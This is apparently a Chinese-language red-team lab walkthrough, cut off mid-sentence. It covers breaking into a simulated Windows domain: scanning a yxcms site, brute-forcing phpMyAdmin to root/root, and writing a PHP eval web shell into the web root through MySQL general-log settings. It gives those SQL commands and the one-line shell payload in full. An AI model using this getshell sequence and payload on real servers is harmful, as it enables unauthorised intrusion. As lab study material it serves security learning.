目录
拓扑图如下:
· Web服务器(Windows7):192.168.10.14 、192.168.52.143 主机名:stu1
· 域成员主机(Windows Server 2003):192.168.52.141 主机名:root-tvi862ubeh
· 域控(Windows Server 2008):192.168.52.138 主机名:owa
其中,Web服务器的192.168.10.14模拟公网地址,我们可以直接访问192.168.10.14。但是我们访问不了192.168.52.0网段。
拿下Web服务器
本文主要是讲内网渗透方面,所以关于怎么拿下Web服务器,比较粗略的过。
说下我们对Web服务器的思路吧。在红蓝对抗中,拿到了入口站点,我们首先会想办法获取入口点的shell,再以此挂隧道通内网。而拿shell无非是上传木马、SQL注入、反序列化。而在很多网站的登录后台后,会存在文件上传漏洞,进而getshell。
访问Web服务器地址 http://192.168.10.14/yxcms/ ,是一个yxcms的站点。关于yxcms的漏洞,传送门:代码审计| yxcms app 1.4.6 漏洞集合
对于yxcms我也不熟悉,之前没接触过。拿到目标第一先用御剑扫描下后台吧
发现phpmyadmin后台登录地址:http://192.168.10.14/phpmyadmin/
发现一个压缩包文件,该文件是网站的压缩包文件:http://192.168.10.14/beifen.rar
发现phpinfo文件:http://192.168.10.14/phpinfo.php
发现一些比较敏感的目录,这些目录都存在目录遍历漏洞
- http://192.168.10.14/yxcms/robots.txt
- http://192.168.10.14/yxcms/data/
- http://192.168.10.14/yxcms/public/
- http://192.168.10.14/yxcms/upload/
- http://192.168.10.14/yxcms/protected/
phpmyadmin后台getshell
对phpmyadmin后台进行爆破,得到账号密码:root/root
进入phpmyadmin后台后,获取shell。传送门:phpmyadmin爆破和后台getshell
这里由于 secure_file_priv的值为NULL,所以我们不能利用写into outfile写木马getshell。
这里我们利用日志文件Getshell。传送门:phpmyadmin利用日志文件Getshell
执行以下命令
set global general_log=on; #开启日志
set global general_log_file='C:/phpstudy/www/yxcms/hack.php'; #设置指定文件为网站日志存放文件
SELECT '<?php eval($_POST["cmd"]);?>' #执行该语句,会将该命令写入日志文件中点击并拖拽以移动
最后用菜刀连接,如下。
后渗透第一步
在拿到了Web服务器的权限后,我们就要尽可能多的搜集该服务器的信息,然后搭建隧道通往内网!
执行以下命令我们知道当前的用户身份是 administrator ,在管理员组中,并且处在域 god 中。该主机有两张网卡,分别是:192.168.10.14,192.168.52.143。由此可知,其实获得的这个权限就是域管理员权限。(搞不懂环境为啥要以域管理员账号登录,为啥不以本地普通用户登录??)
现在我们想反弹一个MSF的